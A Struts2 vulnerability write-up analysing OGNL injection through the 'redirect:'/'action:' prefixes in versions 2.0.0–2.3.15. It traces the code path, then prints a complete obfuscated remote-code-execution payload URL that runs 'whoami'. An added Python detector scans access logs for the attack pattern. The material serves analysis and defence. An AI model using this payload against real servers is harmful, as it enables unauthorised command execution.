Affected versions
Struts 2.0.0 - Struts 2.3.15
0x01 Tips
The main cause is the dynamic method invocation handling.
It is enabled by default; note the four prefixes above.
The configuration below has no effect in this version, because the vulnerable check always ends up calling DefaultActionMapper.allowDynamicMethodCalls.
0x02 Analysis
Tracing the code
Using the 2.3.15 showcase application. Request handling is split into two parts: StrutsPrepareFilter and StrutsExecuteFilter.
First, StrutsPrepareFilter performs the preparation work and calls PrepareOperations.findActionMapping().
This enters DefaultActionMapper.getMapping, which calls handleSpecialParameters to process the request parameters.
It checks whether any parameter matches one of the special handlers.
The matching handler, executed at the second breakpoint in the figure above, extracts the string following "redirect:" and stores it in the mapping as the result.
It is visible in the value stack.
Back in StrutsPrepareFilter, chain.doFilter is executed (the other filters run first here), and StrutsExecuteFilter is entered.
ExecuteOperations.executeAction() is executed.
This enters Dispatcher, which checks whether the mapping carries a Result and processes it.
It then enters ServletRedirectResult (the result class created in step 5), which calls the parent class method StrutsResultSupport.execute().
public void execute(ActionInvocation invocation) throws Exception {
    if (this.anchor != null) {
        // the anchor is run through conditionalParse before the redirect is carried out
        this.anchor = this.conditionalParse(this.anchor, invocation);
    }
    // StrutsResultSupport.execute() applies conditionalParse to the location as well
    super.execute(invocation);
}
Then we reach the familiar code.
0x03 Exploitation conditions
A vulnerable version.
0x04 Exploitation method
The prefixes "action:", "redirect:" and "redirectAction:" can all be used for the attack.
http://localhost:8088/showcase.action?redirect:%24%7B%23req%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27%2B%27uest%27)%2C%23s%3Dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27%5C%5Cs%27))).start().getInputStream()).useDelimiter(%27%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27%2C%23resp%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27)%2C%23resp.setCharacterEncoding(%27UTF-8%27)%2C%23resp.getWriter().println(%23str)%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()%7D%0A
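As an added detection example (not part of the original post or of Struts itself), the following Python scans access log lines for requests whose query string carries one of the three special prefixes handled by DefaultActionMapper.handleSpecialParameters together with an OGNL expression marker, which is the pattern the analysis above describes. The log lines, hosts and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# The three special-parameter prefixes that DefaultActionMapper.handleSpecialParameters
# honours in the affected versions (prefix matching is case-sensitive).
PREFIXES = ("action:", "redirect:", "redirectAction:")
# ${...} or %{...} marks an OGNL expression that the result's conditionalParse
# would evaluate once the prefixed value reaches StrutsResultSupport.execute().
OGNL_MARKER = re.compile(r"[$%]\{")
# Request line inside a Common Log Format entry.
LOG_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def suspicious_params(query: str) -> list:
    """Return the decoded query pairs that combine a special prefix with OGNL."""
    hits = []
    for pair in query.split("&"):
        # Decode the whole pair: the prefixed expression lives in the parameter
        # *name*, but an '=' inside it would split the pair into name/value.
        decoded = unquote(pair)
        if decoded.startswith(PREFIXES) and OGNL_MARKER.search(decoded):
            hits.append(decoded)
    return hits


def scan_access_log(lines) -> list:
    """Return (line_number, hits) for every log line carrying the pattern."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_REQUEST.search(line)
        if not match or "?" not in match.group(1):
            continue
        query = match.group(1).split("?", 1)[1]
        hits = suspicious_params(query)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample log lines (hypothetical hosts and timestamps).
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2013:10:00:01 +0000] "GET /showcase.action?redirect:%24%7B%23a%3D1%7D HTTP/1.1" 302 0',
    '10.0.0.6 - - [17/Jul/2013:10:00:02 +0000] "GET /showcase.action?redirect:index.jsp HTTP/1.1" 302 0',
    '10.0.0.7 - - [17/Jul/2013:10:00:03 +0000] "GET /showcase.action?name=%24%7Bx%7D HTTP/1.1" 200 512',
    '10.0.0.8 - - [17/Jul/2013:10:00:04 +0000] "POST /login.action?action:%25%7B1%2B1%7D HTTP/1.1" 200 80',
]

if __name__ == "__main__":
    for number, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Only lines 1 and 4 are reported: a plain "redirect:index.jsp" and an OGNL marker in an ordinary parameter do not match, so the rule keys on the prefix and the expression together.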